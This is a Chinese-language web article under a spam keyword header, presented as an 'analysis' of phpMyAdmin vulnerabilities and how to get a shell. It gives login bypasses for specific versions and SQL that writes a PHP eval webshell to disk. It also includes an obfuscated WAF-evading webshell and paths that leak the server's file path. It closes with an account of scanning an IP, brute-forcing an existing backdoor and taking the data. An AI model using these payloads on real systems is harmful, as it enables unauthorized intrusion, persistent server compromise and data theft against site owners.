久久久久久久视色,久久电影免费精品,中文亚洲欧美乱码在线观看,在线免费播放AV片

<center id="vfaef"><input id="vfaef"><table id="vfaef"></table></input></center>

    <p id="vfaef"><kbd id="vfaef"></kbd></p>

    
    
    <pre id="vfaef"><u id="vfaef"></u></pre>

      <thead id="vfaef"><input id="vfaef"></input></thead>

    1. 站長資訊網(wǎng)
      最全最豐富的資訊網(wǎng)站

      分析PHPmyadmin漏洞以及拿shell的介紹

      下面由phpmyadmin教程欄目給大家介紹關(guān)于PHPmyadmin漏洞和拿shell,希望對需要的朋友有所幫助!

      分析PHPmyadmin漏洞以及拿shell的介紹

      phpmyadmin的漏洞相對來說,還是比較多的,對于新手來說,分享幾個(gè)漏洞,深入的處于代碼審計(jì)方面的也可以和我討論
      phpmyadmin2.11.3-2.11.4 這兩個(gè)版本存在萬能密碼,直接使用‘localhost’@'@”為賬號,密碼不用輸入。

      phpmyadmin2.11.9.2 這個(gè)版本存在空口令。直接root用戶登陸,密碼不用

      找這個(gè)的話 用自己的寫的腳本,或者搜素引擎什么的,這里懂的人就懂了,不懂也不在這里。

      關(guān)于拿shell,—-》root權(quán)限,并且有寫文件權(quán)限 —-》導(dǎo)出的目錄有寫權(quán)限 —-》有的情況下,就算你這兩個(gè)都有,但是服務(wù)器的一些配置還是會對這個(gè)有影響。

      在getshell之前先進(jìn)入一個(gè)數(shù)據(jù)庫

      第一種,使用sql語句,創(chuàng)建一個(gè)表,添加一個(gè)字段,字段的內(nèi)容為一句話,然后導(dǎo)出到php文件中,最后刪除這個(gè)表,這個(gè)是最保險(xiǎn)的方法
      Create TABLE 表 (列 text NOT NULL)
      Insert INTO 表 (列) VALUES('<?php eval($_POST[mima])?>')
      select 列 from 表 into _utfile '路徑'
      Drop TABLE IF EXISTS 表;
      第二種方法,這個(gè)是直接寫入
      select '一句話'INTO _UTFILE '路徑'
      還有幾種方法,大致原理都一樣。
      然后,一般的話,一句話都是

      <?php @eval($_POST[x])?>

      有狗的話,用免殺一句話,下面這個(gè)是我過年前構(gòu)造的過狗一句話,現(xiàn)在應(yīng)該還可以過

      <?php
      $a = 's';
      $str = str_repeat($a,2);
      $to = $_POST;
      //echo $str;
      $exp = 'a'.$str[0].$str[1].'e'.'r'.'t';
      $exp($to['x'])
      ?>

      找路徑的話,

      1// 利用phpinfo.php
      2//利用phpmyadmin的一些文件報(bào)錯(cuò),下面都是網(wǎng)上通用的
      /phpMyAdmin/index.php?lang[]=1
      /phpMyAdmin/phpinfo.php
      /load_file()
      /phpmyadmin/themes/darkblue_orange/layout.inc.php
      /phpmyadmin/libraries/select_lang.lib.php
      /phpmyadmin/libraries/lect_lang.lib.php
      /phpmyadmin/libraries/mcrypt.lib.php
      /phpmyadmin/libraries/export/xls.php

      3//再者就是利用網(wǎng)站包路徑,這些會的都會了,不會的慢慢的就會了。

      下面開始實(shí)戰(zhàn),腳本掃到一個(gè)IP,顯示存在phpmyadmin,打開

      分析PHPmyadmin漏洞以及拿shell的介紹

      一看這些php文件就是后門一句話,放到幾萬字典爆破,兩秒鐘

      分析PHPmyadmin漏洞以及拿shell的介紹

      直接菜刀鏈接。。。。。
      這個(gè)肯定被人搞了,直接打包好東西,你懂的。。。提權(quán)什么的就不必要了。

      分析PHPmyadmin漏洞以及拿shell的介紹

      贊(0)
      分享到: 更多 (0)
      網(wǎng)站地圖   滬ICP備18035694號-2    滬公網(wǎng)安備31011702889846號